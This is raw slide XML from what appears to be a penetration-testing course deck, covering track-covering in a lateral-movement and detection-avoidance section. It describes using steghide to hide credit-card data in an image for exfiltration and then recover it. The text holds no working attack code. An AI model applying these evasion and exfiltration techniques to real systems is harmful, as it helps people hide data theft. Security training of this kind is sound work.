              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Remove all customer data from your systems, including attacking systems and any other support systems. Typically, you should do this after creating and delivering the penetration testing report to the client.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>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dirty="0"/>
              <a:t>54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20409823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Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="100" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="274320"/>
            <a:ext cx="9144000" cy="386033"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>How to Cover Your Tracks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="CaixaDeTexto 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5864AF26-9D47-D357-E812-E73655EAD214}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="979457"/>
            <a:ext cx="5339903"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rgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Steganography</a:t>
            </a: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Attackers can use it for obfuscation, evasion, and to cover their tracks.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Steganography</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> involves hiding a message or any other content inside an image or a video file. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="140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To accomplish this task, you can use tools such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>steghide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="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You can easily install this tool in a Debian-based Linux system by using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> apt install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>steghide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>command. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="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The figure shows the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>steghide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> command usage and help information (output omitted for brevity).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagem 4" descr="Tela de computador com texto preto sobre fundo branco&#10;&#10;Descrição gerada automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E62AA1DB-9B06-29B3-E48A-1BA6A1FE85CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5605013" y="979193"/>
            <a:ext cx="3088256" cy="3842879"/>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dirty="0"/>
              <a:t>55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3925702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Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="100" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="274320"/>
            <a:ext cx="9144000" cy="386033"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>How to Cover Your Tracks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="CaixaDeTexto 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5864AF26-9D47-D357-E812-E73655EAD214}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="979457"/>
            <a:ext cx="5027196"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Let’s take a look at an example of how to embed sensitive information and hide a message within an image file by using steganography. </a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="Arial"/>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In the figure on the side, a file called secret.txt includes sensitive information (credit card data) that will be exfiltrated using steganography.</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Imagem 6" descr="Texto&#10;&#10;Descrição gerada automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70DEFCD2-C3EC-A888-CAB7-0E5214877E22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5450277" y="981164"/>
            <a:ext cx="2944842" cy="1466670"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="CaixaDeTexto 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DDB1744-31A0-FE53-522E-B7C7C441460C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2824" y="2877524"/>
            <a:ext cx="835914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pt-BR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>following</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> figure shows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>how</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>embed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>sensitive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> data (secret.txt) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>into</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>image</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> file (websploit-logo.png) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>steghide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Imagem 8" descr="Texto&#10;&#10;Descrição gerada automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9028393-F340-09D7-B743-DD63000A4A07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4321834" y="3563322"/>
            <a:ext cx="3799935" cy="1230195"/>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dirty="0"/>
              <a:t>56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1797815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Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="100" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="274320"/>
            <a:ext cx="9144000" cy="386033"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>How to Cover Your Tracks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="CaixaDeTexto 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5864AF26-9D47-D357-E812-E73655EAD214}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="979457"/>
            <a:ext cx="839149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The following example shows how the sensitive data is retrieved from the image and saved in a file ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>extracted_data.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> ).</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagem 8" descr="Tela preta com letras brancas&#10;&#10;Descrição gerada automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BABBC763-E4D2-4ABB-3462-9E83FF86B109}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2488720" y="1564185"/>
            <a:ext cx="4037162" cy="807432"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="CaixaDeTexto 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DDB1744-31A0-FE53-522E-B7C7C441460C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2824" y="2694213"/>
            <a:ext cx="834836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The following example shows the contents of the extracted data file (extracted_data.txt).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Imagem 9" descr="Texto&#10;&#10;Descrição gerada automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AF2E5D7-9DB8-D3D8-3E8C-EE5887367A83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
